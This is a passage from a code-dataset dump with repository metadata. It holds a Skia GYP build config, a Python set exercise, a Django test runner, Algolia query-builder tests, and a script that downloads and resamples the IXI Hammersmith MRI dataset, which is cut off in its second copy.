'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm" and arm_version >= 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.h',
'../third_party/skia/src/opts/SkBlurImage_opts_arm.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_arm.cpp',
'../third_party/skia/src/opts/SkUtils_opts_arm.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
],
}],
[ 'target_arch == "mipsel"',{
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm64"',{
# TODO(rmcilroy): Update this once http://crrev.com/143423004/ lands.
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
],
},
# For the same lame reasons as what is done for skia_opts, we have to
# create another target specifically for SSSE3 code as we would not want
# to compile the SSE2 code with -mssse3 which would potentially allow
# gcc to generate SSSE3 code.
{
'target_name': 'skia_opts_ssse3',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'conditions': [
[ 'OS in ["linux", "freebsd", "openbsd", "solaris", "android"]', {
'cflags': [
'-mssse3',
],
}],
[ 'OS == "mac"', {
'xcode_settings': {
'GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS': 'YES',
},
}],
[ 'OS == "win"', {
'include_dirs': [
'config/win',
],
'direct_dependent_settings': {
'include_dirs': [
'config/win',
],
},
}],
[ 'target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSSE3.cpp',
],
}],
],
},
{
'target_name': 'skia_opts_none',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
},
],
'conditions': [
# NEON code must be compiled with -mfpu=neon which also affects scalar
# code. To support dynamic NEON code paths, we need to build all
# NEON-specific sources in a separate static library. The situation
# is very similar to the SSSE3 one.
['target_arch == "arm" and (arm_neon == 1 or arm_neon_optional == 1)', {
'targets': [
{
'target_name': 'skia_opts_neon',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'cflags!': [
'-fno-omit-frame-pointer',
'-mfpu=vfp', # remove them all, just in case.
'-mfpu=vfpv3',
'-mfpu=vfpv3-d16',
],
'cflags': [
'-mfpu=neon',
'-fomit-frame-pointer',
],
'ldflags': [
'-march=armv7-a',
'-Wl,--fix-cortex-a8',
],
'sources': [
'../third_party/skia/src/opts/memset16_neon.S',
'../third_party/skia/src/opts/memset32_neon.S',
'../third_party/skia/src/opts/SkBitmapProcState_arm_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrixProcs_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_clamp_neon.h',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_repeat_neon.h',
'../third_party/skia/src/opts/SkBlitMask_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_neon.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_neon.cpp',
],
'conditions': [
['arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
['arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
],
},
],
}],
],
}
| true
| true
|
f71907adad9d2ae1000384e3083a6e18b87ab471
| 98
|
py
|
Python
|
Solution/90.py
|
pallavimr12/Python_Levelwise_Exercises
|
4090437b537260be2eca06c8d52d3a2bba1f5a5e
|
[
"BSD-3-Clause"
] | 2
|
2020-10-23T10:55:58.000Z
|
2020-11-24T04:26:23.000Z
|
Solution/90.py
|
pallavimr12/Python_Levelwise_Exercises
|
4090437b537260be2eca06c8d52d3a2bba1f5a5e
|
[
"BSD-3-Clause"
] | null | null | null |
Solution/90.py
|
pallavimr12/Python_Levelwise_Exercises
|
4090437b537260be2eca06c8d52d3a2bba1f5a5e
|
[
"BSD-3-Clause"
] | 2
|
2020-11-19T06:37:29.000Z
|
2022-01-18T14:36:46.000Z
|
set1=set([1,3,6,78,35,55])
set2=set([12,24,35,24,88,120,155])
set1 &= set2
li=list(set1)
print(li)
| 19.6
| 34
| 0.653061
|
set1=set([1,3,6,78,35,55])
set2=set([12,24,35,24,88,120,155])
set1 &= set2
li=list(set1)
print(li)
| true
| true
|
f71908625209dd39e30f636c7b0dfff45f945d88
| 2,104
|
py
|
Python
|
runtests.py
|
timgates42/django-spillway
|
f5700e21e545106005a99ba0804f7d6c88038553
|
[
"BSD-3-Clause"
] | 62
|
2015-01-20T22:21:09.000Z
|
2019-11-25T12:57:53.000Z
|
runtests.py
|
timgates42/django-spillway
|
f5700e21e545106005a99ba0804f7d6c88038553
|
[
"BSD-3-Clause"
] | 24
|
2015-01-07T00:03:10.000Z
|
2021-06-10T17:34:35.000Z
|
runtests.py
|
timgates42/django-spillway
|
f5700e21e545106005a99ba0804f7d6c88038553
|
[
"BSD-3-Clause"
] | 19
|
2015-01-12T18:08:29.000Z
|
2020-08-10T17:16:31.000Z
|
#!/usr/bin/env python
import os
import sys
import shutil
import tempfile
import traceback
from django.conf import settings
import django
TMPDIR = tempfile.mkdtemp(prefix='spillway_')
DEFAULT_SETTINGS = {
'INSTALLED_APPS': (
'django.contrib.staticfiles',
'django.contrib.gis',
'rest_framework',
'spillway',
'tests',
),
'DATABASES': {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.spatialite',
'NAME': 'spillway.db',
'TEST': {'NAME': os.path.join(TMPDIR, 'test.db')}
}
},
'MEDIA_ROOT': TMPDIR,
'MIDDLEWARE': (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
),
'ROOT_URLCONF': 'tests.urls',
'STATIC_URL': '/static/',
'SPATIALITE_LIBRARY_PATH': 'mod_spatialite.so',
'TEMPLATES': [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}],
'REST_FRAMEWORK': {
# Fix for Django 1.9:
# https://github.com/tomchristie/django-rest-framework/issues/3494
'UNAUTHENTICATED_USER': None
}
}
def teardown():
try:
shutil.rmtree(TMPDIR)
except OSError:
print('Failed to remove {}'.format(TMPDIR))
def runtests():
if not settings.configured:
settings.configure(**DEFAULT_SETTINGS)
django.setup()
from spillway.models import upload_to
os.mkdir(os.path.join(TMPDIR, upload_to.path))
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
try:
from django.test.runner import DiscoverRunner
runner_class = DiscoverRunner
except ImportError:
from django.test.simple import DjangoTestSuiteRunner
runner_class = DjangoTestSuiteRunner
try:
status = runner_class(
verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
except Exception:
traceback.print_exc()
status = 1
finally:
teardown()
sys.exit(status)
if __name__ == '__main__':
runtests()
| 26.632911
| 79
| 0.626901
|
import os
import sys
import shutil
import tempfile
import traceback
from django.conf import settings
import django
TMPDIR = tempfile.mkdtemp(prefix='spillway_')
DEFAULT_SETTINGS = {
'INSTALLED_APPS': (
'django.contrib.staticfiles',
'django.contrib.gis',
'rest_framework',
'spillway',
'tests',
),
'DATABASES': {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.spatialite',
'NAME': 'spillway.db',
'TEST': {'NAME': os.path.join(TMPDIR, 'test.db')}
}
},
'MEDIA_ROOT': TMPDIR,
'MIDDLEWARE': (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
),
'ROOT_URLCONF': 'tests.urls',
'STATIC_URL': '/static/',
'SPATIALITE_LIBRARY_PATH': 'mod_spatialite.so',
'TEMPLATES': [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}],
'REST_FRAMEWORK': {
'UNAUTHENTICATED_USER': None
}
}
def teardown():
try:
shutil.rmtree(TMPDIR)
except OSError:
print('Failed to remove {}'.format(TMPDIR))
def runtests():
if not settings.configured:
settings.configure(**DEFAULT_SETTINGS)
django.setup()
from spillway.models import upload_to
os.mkdir(os.path.join(TMPDIR, upload_to.path))
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
try:
from django.test.runner import DiscoverRunner
runner_class = DiscoverRunner
except ImportError:
from django.test.simple import DjangoTestSuiteRunner
runner_class = DjangoTestSuiteRunner
try:
status = runner_class(
verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
except Exception:
traceback.print_exc()
status = 1
finally:
teardown()
sys.exit(status)
if __name__ == '__main__':
runtests()
| true
| true
|
f71908676eab5124d188403862efaa148addfb00
| 3,684
|
py
|
Python
|
tests/test_filters.py
|
Ryanb58/algoliaqb
|
d92a29e46d3ab4fd84685835a2b858e3ba8aecbb
|
[
"MIT"
] | 4
|
2020-08-28T19:22:02.000Z
|
2020-09-04T21:12:43.000Z
|
tests/test_filters.py
|
Ryanb58/algoliaqb
|
d92a29e46d3ab4fd84685835a2b858e3ba8aecbb
|
[
"MIT"
] | 3
|
2020-08-31T16:05:47.000Z
|
2020-09-11T16:31:24.000Z
|
tests/test_filters.py
|
Ryanb58/algoliaqb
|
d92a29e46d3ab4fd84685835a2b858e3ba8aecbb
|
[
"MIT"
] | null | null | null |
from algoliaqb import AlgoliaQueryBuilder
def test_normal_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True
}
filter_query = aqb.get_filter_query(flask_request_args)
assert filter_query == "is_reported:True"
def test_object_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"status_id": {
"status_id": "statuses.status_id",
"group_id": "statuses.group_id"
},
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True,
"status_id": 21,
"group_id": 4
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "is_reported:True" in filter_query
assert "statuses.status_id:21" in filter_query
assert "statuses.group_id:4" in filter_query
assert filter_query == "(statuses.status_id:21 AND statuses.group_id:4) AND is_reported:True"
def test_date_filter():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id":"group_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on"
}
}
)
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on > 1538697600" in filter_query
assert filter_query == "group_id:4 AND created_on > 1538697600"
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on:1538697600 TO 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on:1538697600 TO 1539697800"
flask_request_args = {
"group_id": 4,
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on < 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on < 1539697800"
def test_not_using_normal_string_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id": "group_id",
"status_id": {
"group_id": "statuses.group_id",
"status_id": "statuses.status_id",
},
"is_reported": "is_reported",
"main_contact_account_id": "main_contact.account_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on",
},
"updated_on": {
"type": "date",
"updated_on_start": "updated_on",
"updated_on_end": "updated_on",
},
"referral_source_id": {
"group_id": "referral_sources.group_id",
"referral_source_id": "referral_sources.id",
},
"tag_id": {
"group_id": "tags.group_id",
"tag_id": "tags.id",
}
}
)
flask_request_args = {
"page": 1,
"order_by": "status_custom-position",
"group_id": 4,
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "group_id:4" in filter_query
assert filter_query == "group_id:4"
| 26.695652
| 97
| 0.575461
|
from algoliaqb import AlgoliaQueryBuilder
def test_normal_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True
}
filter_query = aqb.get_filter_query(flask_request_args)
assert filter_query == "is_reported:True"
def test_object_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"status_id": {
"status_id": "statuses.status_id",
"group_id": "statuses.group_id"
},
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True,
"status_id": 21,
"group_id": 4
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "is_reported:True" in filter_query
assert "statuses.status_id:21" in filter_query
assert "statuses.group_id:4" in filter_query
assert filter_query == "(statuses.status_id:21 AND statuses.group_id:4) AND is_reported:True"
def test_date_filter():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id":"group_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on"
}
}
)
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on > 1538697600" in filter_query
assert filter_query == "group_id:4 AND created_on > 1538697600"
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on:1538697600 TO 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on:1538697600 TO 1539697800"
flask_request_args = {
"group_id": 4,
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on < 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on < 1539697800"
def test_not_using_normal_string_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id": "group_id",
"status_id": {
"group_id": "statuses.group_id",
"status_id": "statuses.status_id",
},
"is_reported": "is_reported",
"main_contact_account_id": "main_contact.account_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on",
},
"updated_on": {
"type": "date",
"updated_on_start": "updated_on",
"updated_on_end": "updated_on",
},
"referral_source_id": {
"group_id": "referral_sources.group_id",
"referral_source_id": "referral_sources.id",
},
"tag_id": {
"group_id": "tags.group_id",
"tag_id": "tags.id",
}
}
)
flask_request_args = {
"page": 1,
"order_by": "status_custom-position",
"group_id": 4,
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "group_id:4" in filter_query
assert filter_query == "group_id:4"
| true
| true
|
f7190a9265422f741faef15c4be15a7052a9510b
| 7,314
|
py
|
Python
|
data/IXI_HH/download_IXI_HH.py
|
sambuddinc/DLTK
|
9511b0b9860118a9285c2fe730ea49dfe247cab6
|
[
"Apache-2.0"
] | null | null | null |
data/IXI_HH/download_IXI_HH.py
|
sambuddinc/DLTK
|
9511b0b9860118a9285c2fe730ea49dfe247cab6
|
[
"Apache-2.0"
] | null | null | null |
data/IXI_HH/download_IXI_HH.py
|
sambuddinc/DLTK
|
9511b0b9860118a9285c2fe730ea49dfe247cab6
|
[
"Apache-2.0"
] | 1
|
2021-04-29T03:01:53.000Z
|
2021-04-29T03:01:53.000Z
|
# -*- coding: utf-8 -*-
"""Download and extract the IXI Hammersmith Hospital 3T dataset
url: http://brain-development.org/ixi-dataset/
ref: IXI – Information eXtraction from Images (EPSRC GR/S21533/02)
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future.standard_library import install_aliases # py 2/3 compatability
install_aliases()
from urllib.request import FancyURLopener
import os.path
import tarfile
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
DOWNLOAD_IMAGES = True
EXTRACT_IMAGES = True
PROCESS_OTHER = True
RESAMPLE_IMAGES = True
CLEAN_UP = True
def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False):
original_spacing = itk_image.GetSpacing()
original_size = itk_image.GetSize()
out_size = [int(np.round(original_size[0]*(original_spacing[0]/out_spacing[0]))),
int(np.round(original_size[1]*(original_spacing[1]/out_spacing[1]))),
int(np.round(original_size[2]*(original_spacing[2]/out_spacing[2])))]
resample = sitk.ResampleImageFilter()
resample.SetOutputSpacing(out_spacing)
resample.SetSize(out_size)
resample.SetOutputDirection(itk_image.GetDirection())
resample.SetOutputOrigin(itk_image.GetOrigin())
resample.SetTransform(sitk.Transform())
resample.SetDefaultPixelValue(itk_image.GetPixelIDValue())
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
def reslice_image(itk_image, itk_ref, is_label=False):
resample = sitk.ResampleImageFilter()
resample.SetReferenceImage(itk_ref)
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
urls = {}
urls['t1'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T1.tar'
urls['t2'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T2.tar'
urls['pd'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-PD.tar'
urls['mra'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-MRA.tar'
urls['demographic'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI.xls'
fnames = {}
fnames['t1'] = 't1.tar'
fnames['t2'] = 't2.tar'
fnames['pd'] = 'pd.tar'
fnames['mra'] = 'mra.tar'
fnames['demographic'] = 'demographic.xls'
if DOWNLOAD_IMAGES:
# Download all IXI data
for key, url in urls.items():
if not os.path.isfile(fnames[key]):
print('Downloading {} from {}'.format(fnames[key], url))
curr_file = FancyURLopener()
curr_file.retrieve(url, fnames[key])
else:
print('File {} already exists. Skipping download.'.format(
fnames[key]))
if EXTRACT_IMAGES:
# Extract the HH subset of IXI
for key, fname in fnames.items():
if (fname.endswith('.tar')):
print('Extracting IXI HH data from {}.'.format(fnames[key]))
output_dir = os.path.join('./orig/', key)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
t = tarfile.open(fname, 'r')
for member in t.getmembers():
if '-HH-' in member.name:
t.extract(member, output_dir)
if PROCESS_OTHER:
# Process the demographic xls data and save to csv
xls = pd.ExcelFile('demographic.xls')
print(xls.sheet_names)
df = xls.parse('Table')
for index, row in df.iterrows():
IXI_id = 'IXI{:03d}'.format(row['IXI_ID'])
df.loc[index, 'IXI_ID'] = IXI_id
t1_exists = len(glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id)))
t2_exists = len(glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id)))
pd_exists = len(glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id)))
mra_exists = len(glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id)))
# Check if each entry is complete and drop if not
# if not t1_exists and not t2_exists and not pd_exists and not mra
# exists:
if not (t1_exists and t2_exists and pd_exists and mra_exists):
df.drop(index, inplace=True)
# Write to csv file
df.to_csv('demographic_HH.csv', index=False)
if RESAMPLE_IMAGES:
# Resample the IXI HH T2 images to 1mm isotropic and reslice all
# others to it
df = pd.read_csv('demographic_HH.csv', dtype=object, keep_default_na=False,
na_values=[]).as_matrix()
for i in df:
IXI_id = i[0]
print('Resampling {}'.format(IXI_id))
t1_fn = glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id))[0]
t2_fn = glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id))[0]
pd_fn = glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id))[0]
mra_fn = glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id))[0]
t1 = sitk.ReadImage(t1_fn)
t2 = sitk.ReadImage(t2_fn)
pd = sitk.ReadImage(pd_fn)
mra = sitk.ReadImage(mra_fn)
# Resample to 1mm isotropic resolution
t2_1mm = resample_image(t2)
t1_1mm = reslice_image(t1, t2_1mm)
pd_1mm = reslice_image(pd, t2_1mm)
mra_1mm = reslice_image(mra, t2_1mm)
output_dir = os.path.join('./1mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t1_1mm.GetSize(), t1_1mm.GetSpacing()))
print('T2: {} {}'.format(t2_1mm.GetSize(), t2_1mm.GetSpacing()))
print('PD: {} {}'.format(pd_1mm.GetSize(), pd_1mm.GetSpacing()))
print('MRA: {} {}'.format(mra_1mm.GetSize(), mra_1mm.GetSpacing()))
sitk.WriteImage(t1_1mm, os.path.join(output_dir, 'T1_1mm.nii.gz'))
sitk.WriteImage(t2_1mm, os.path.join(output_dir, 'T2_1mm.nii.gz'))
sitk.WriteImage(pd_1mm, os.path.join(output_dir, 'PD_1mm.nii.gz'))
sitk.WriteImage(mra_1mm, os.path.join(output_dir, 'MRA_1mm.nii.gz'))
# Resample to 2mm isotropic resolution
t2_2mm = resample_image(t2, out_spacing=[2.0, 2.0, 2.0])
t1_2mm = reslice_image(t1, t2_2mm)
pd_2mm = reslice_image(pd, t2_2mm)
mra_2mm = reslice_image(mra, t2_2mm)
output_dir = os.path.join('./2mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t2_2mm.GetSize(), t1_2mm.GetSpacing()))
print('T2: {} {}'.format(t2_2mm.GetSize(), t2_2mm.GetSpacing()))
print('PD: {} {}'.format(pd_2mm.GetSize(), pd_2mm.GetSpacing()))
print('MRA: {} {}'.format(mra_2mm.GetSize(), mra_2mm.GetSpacing()))
sitk.WriteImage(t1_2mm, os.path.join(output_dir, 'T1_2mm.nii.gz'))
sitk.WriteImage(t2_2mm, os.path.join(output_dir, 'T2_2mm.nii.gz'))
sitk.WriteImage(pd_2mm, os.path.join(output_dir, 'PD_2mm.nii.gz'))
sitk.WriteImage(mra_2mm, os.path.join(output_dir, 'MRA_2mm.nii.gz'))
if CLEAN_UP:
# Remove the .tar files
for key, fname in fnames.items():
if (fname.endswith('.tar')):
os.remove(fname)
# Remove all data in original resolution
os.system('rm -rf orig')
| 35.852941
| 92
| 0.649439
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future.standard_library import install_aliases
install_aliases()
from urllib.request import FancyURLopener
import os.path
import tarfile
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
DOWNLOAD_IMAGES = True
EXTRACT_IMAGES = True
PROCESS_OTHER = True
RESAMPLE_IMAGES = True
CLEAN_UP = True
def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False):
original_spacing = itk_image.GetSpacing()
original_size = itk_image.GetSize()
out_size = [int(np.round(original_size[0]*(original_spacing[0]/out_spacing[0]))),
int(np.round(original_size[1]*(original_spacing[1]/out_spacing[1]))),
int(np.round(original_size[2]*(original_spacing[2]/out_spacing[2])))]
resample = sitk.ResampleImageFilter()
resample.SetOutputSpacing(out_spacing)
resample.SetSize(out_size)
resample.SetOutputDirection(itk_image.GetDirection())
resample.SetOutputOrigin(itk_image.GetOrigin())
resample.SetTransform(sitk.Transform())
resample.SetDefaultPixelValue(itk_image.GetPixelIDValue())
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
def reslice_image(itk_image, itk_ref, is_label=False):
resample = sitk.ResampleImageFilter()
resample.SetReferenceImage(itk_ref)
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
urls = {}
urls['t1'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T1.tar'
urls['t2'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T2.tar'
urls['pd'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-PD.tar'
urls['mra'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-MRA.tar'
urls['demographic'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI.xls'
fnames = {}
fnames['t1'] = 't1.tar'
fnames['t2'] = 't2.tar'
fnames['pd'] = 'pd.tar'
fnames['mra'] = 'mra.tar'
fnames['demographic'] = 'demographic.xls'
if DOWNLOAD_IMAGES:
for key, url in urls.items():
if not os.path.isfile(fnames[key]):
print('Downloading {} from {}'.format(fnames[key], url))
curr_file = FancyURLopener()
curr_file.retrieve(url, fnames[key])
else:
print('File {} already exists. Skipping download.'.format(
fnames[key]))
if EXTRACT_IMAGES:
for key, fname in fnames.items():
if (fname.endswith('.tar')):
print('Extracting IXI HH data from {}.'.format(fnames[key]))
output_dir = os.path.join('./orig/', key)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
t = tarfile.open(fname, 'r')
for member in t.getmembers():
if '-HH-' in member.name:
t.extract(member, output_dir)
if PROCESS_OTHER:
xls = pd.ExcelFile('demographic.xls')
print(xls.sheet_names)
df = xls.parse('Table')
for index, row in df.iterrows():
IXI_id = 'IXI{:03d}'.format(row['IXI_ID'])
df.loc[index, 'IXI_ID'] = IXI_id
t1_exists = len(glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id)))
t2_exists = len(glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id)))
pd_exists = len(glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id)))
mra_exists = len(glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id)))
if not (t1_exists and t2_exists and pd_exists and mra_exists):
df.drop(index, inplace=True)
df.to_csv('demographic_HH.csv', index=False)
if RESAMPLE_IMAGES:
df = pd.read_csv('demographic_HH.csv', dtype=object, keep_default_na=False,
na_values=[]).as_matrix()
for i in df:
IXI_id = i[0]
print('Resampling {}'.format(IXI_id))
t1_fn = glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id))[0]
t2_fn = glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id))[0]
pd_fn = glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id))[0]
mra_fn = glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id))[0]
t1 = sitk.ReadImage(t1_fn)
t2 = sitk.ReadImage(t2_fn)
pd = sitk.ReadImage(pd_fn)
mra = sitk.ReadImage(mra_fn)
t2_1mm = resample_image(t2)
t1_1mm = reslice_image(t1, t2_1mm)
pd_1mm = reslice_image(pd, t2_1mm)
mra_1mm = reslice_image(mra, t2_1mm)
output_dir = os.path.join('./1mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t1_1mm.GetSize(), t1_1mm.GetSpacing()))
print('T2: {} {}'.format(t2_1mm.GetSize(), t2_1mm.GetSpacing()))
print('PD: {} {}'.format(pd_1mm.GetSize(), pd_1mm.GetSpacing()))
print('MRA: {} {}'.format(mra_1mm.GetSize(), mra_1mm.GetSpacing()))
sitk.WriteImage(t1_1mm, os.path.join(output_dir, 'T1_1mm.nii.gz'))
sitk.WriteImage(t2_1mm, os.path.join(output_dir, 'T2_1mm.nii.gz'))
sitk.WriteImage(pd_1mm, os.path.join(output_dir, 'PD_1mm.nii.gz'))
sitk.WriteImage(mra_1mm, os.path.join(output_dir, 'MRA_1mm.nii.gz'))
t2_2mm = resample_image(t2, out_spacing=[2.0, 2.0, 2.0])
t1_2mm = reslice_image(t1, t2_2mm)
pd_2mm = reslice_image(pd, t2_2mm)
mra_2mm = reslice_image(mra, t2_2mm)
output_dir = os.path.join('./2mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t2_2mm.GetSize(), t1_2mm.GetSpacing()))
print('T2: {} {}'.format(t2_2mm.GetSize(), t2_2mm.GetSpacing()))
print('PD: {} {}'.format(pd_2mm.GetSize(), pd_2mm.GetSpacing()))
print('MRA: {} {}'.format(mra_2mm.GetSize(), mra_2mm.GetSpacing()))
sitk.WriteImage(t1_2mm, os.path.join(output_dir, 'T1_2mm.nii.gz'))
sitk.WriteImage(t2_2mm, os.path.join(output_dir, 'T2_2mm.nii.gz'))
sitk.WriteImage(pd_2mm, os.path.join(output_dir, 'PD_2mm.nii.gz'))
sitk.WriteImage(mra_2mm, os.path.join(output_dir, 'MRA_2mm.nii.gz'))
if CLEAN_UP:
